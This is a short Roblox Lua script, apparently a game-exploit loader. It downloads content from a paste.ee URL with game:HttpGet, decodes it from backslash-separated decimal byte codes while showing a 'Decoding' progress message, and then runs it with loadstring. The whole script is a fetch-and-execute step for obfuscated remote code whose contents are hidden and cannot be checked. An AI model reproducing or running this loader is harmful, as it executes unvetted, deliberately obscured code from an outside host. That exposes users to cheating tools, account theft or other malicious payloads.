local bytes = game:HttpGet("https://paste.ee/r/ebKhM7zA") bytes = bytes:split("\\") local lua = "" local Message = Instance.new('Message', game:GetService("CoreGui")) Message.Text = "Decoding" local len = #bytes for i = 1, len do local number = tonumber(bytes[i]) if number then lua = lua .. string.char(number) end if i%30000 == 0 then Message.Text = "Decoding ("..tostring(i).."/"..tostring(len)..")" task.wait() end end Message:Destroy() loadstring(lua)()